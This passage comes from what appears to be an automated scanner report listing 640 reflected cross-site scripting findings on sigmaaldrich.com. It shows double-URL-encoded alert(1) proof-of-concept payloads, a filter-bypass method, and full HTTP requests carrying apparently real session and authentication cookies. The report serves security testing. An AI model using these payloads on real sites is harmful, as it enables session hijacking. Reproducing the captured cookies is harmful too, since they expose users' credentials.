1.486. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 4]

1.487. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 5]

1.488. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 1]

1.489. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 2]

1.490. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 3]

1.491. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 4]

1.492. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 5]

1.493. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 1]

1.494. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 2]

1.495. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 3]

1.496. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 4]

1.497. http://www.sigmaaldrich.com/foresee/foresee-trigger.js [REST URL parameter 1]

1.498. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 1]

1.499. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 2]

1.500. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 1]

1.501. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 2]

1.502. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 1]

1.503. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 2]

1.504. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 1]

1.505. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 2]

1.506. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 1]

1.507. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 2]

1.508. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 3]

1.509. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 1]

1.510. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 2]

1.511. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 3]

1.512. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 1]

1.513. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 2]

1.514. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 3]

1.515. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 1]

1.516. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 2]

1.517. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 1]

1.518. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 2]

1.519. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 1]

1.520. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 2]

1.521. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 1]

1.522. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 2]

1.523. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 1]

1.524. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 2]

1.525. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 1]

1.526. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 2]

1.527. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 1]

1.528. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 2]

1.529. http://www.sigmaaldrich.com/life-science.html [REST URL parameter 1]

1.530. http://www.sigmaaldrich.com/life-science/ [REST URL parameter 1]

1.531. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 1]

1.532. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 2]

1.533. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 1]

1.534. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 2]

1.535. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 1]

1.536. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 2]

1.537. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 1]

1.538. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 2]

1.539. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 1]

1.540. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 2]

1.541. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 1]

1.542. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 2]

1.543. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 1]

1.544. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 2]

1.545. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 3]

1.546. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 1]

1.547. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 2]

1.548. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 3]

1.549. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 4]

1.550. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/mission-custom-request.html [REST URL parameter 1]

1.551. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 1]

1.552. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 2]

1.553. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 1]

1.554. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 2]

1.555. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 1]

1.556. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 2]

1.557. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 1]

1.558. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 2]

1.559. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 1]

1.560. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 2]

1.561. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 3]

1.562. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 1]

1.563. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 2]

1.564. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 3]

1.565. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 1]

1.566. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 2]

1.567. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 1]

1.568. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 2]

1.569. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 1]

1.570. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 2]

1.571. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 1]

1.572. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 2]

1.573. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 1]

1.574. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 2]

1.575. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 1]

1.576. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 2]

1.577. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 1]

1.578. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 2]

1.579. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 1]

1.580. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 2]

1.581. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 3]

1.582. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 1]

1.583. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 2]

1.584. http://www.sigmaaldrich.com/materials-science.html [REST URL parameter 1]

1.585. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 1]

1.586. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 2]

1.587. http://www.sigmaaldrich.com/materials-science/learning-center.html [REST URL parameter 1]

1.588. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 1]

1.589. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 2]

1.590. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 1]

1.591. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 2]

1.592. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 1]

1.593. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 2]

1.594. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 1]

1.595. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 2]

1.596. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 1]

1.597. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 2]

1.598. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 1]

1.599. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 2]

1.600. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 1]

1.601. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 2]

1.602. http://www.sigmaaldrich.com/materials-science/renewable-alternative-energy.html [REST URL parameter 1]

1.603. http://www.sigmaaldrich.com/safc-global/en-us/home.html [REST URL parameter 1]

1.604. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 1]

1.605. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 2]

1.606. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 3]

1.607. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 4]

1.608. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 5]

1.609. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 1]

1.610. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 2]

1.611. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 3]

1.612. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 4]

1.613. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 5]

1.614. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 1]

1.615. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 2]

1.616. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 1]

1.617. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 2]

1.618. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 1]

1.619. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 2]

1.620. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 3]

1.621. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 1]

1.622. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 2]

1.623. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 1]

1.624. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 2]

1.625. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 1]

1.626. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 2]

1.627. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 3]

1.628. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 1]

1.629. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 2]

1.630. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 3]

1.631. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 1]

1.632. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 2]

1.633. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 3]

1.634. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 1]

1.635. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 2]

1.636. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 1]

1.637. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 2]

1.638. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 1]

1.639. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 2]

1.640. http://www.sigmaaldrich.com/united-states.html [REST URL parameter 1]



1. Cross-site scripting (reflected)
There are 640 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.sigmaaldrich.com/analytical-chromatography.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86200%2522%253balert%25281%2529%252f%252fd55c80e042a was submitted in the REST URL parameter 1. This input was echoed as 86200";alert(1)//d55c80e042a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /86200%2522%253balert%25281%2529%252f%252fd55c80e042a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:52 GMT
Content-Length: 28904
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/86200";alert(1)//d55c80e042a","E404") ;
   </script>
...[SNIP]...

1.2. http://www.sigmaaldrich.com/analytical-chromatography/air-monitoring.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/air-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60fed%2522%253balert%25281%2529%252f%252f46bc722615b was submitted in the REST URL parameter 1. This input was echoed as 60fed";alert(1)//46bc722615b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography60fed%2522%253balert%25281%2529%252f%252f46bc722615b/air-monitoring.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography60fed";alert(1)//46bc722615b/air-monitoring.html","E404") ;
   </script>
...[SNIP]...

1.3. http://www.sigmaaldrich.com/analytical-chromatography/air-monitoring.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/air-monitoring.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5adfd%2522%253balert%25281%2529%252f%252f6b84be9a72b was submitted in the REST URL parameter 2. This input was echoed as 5adfd";alert(1)//6b84be9a72b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/5adfd%2522%253balert%25281%2529%252f%252f6b84be9a72b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
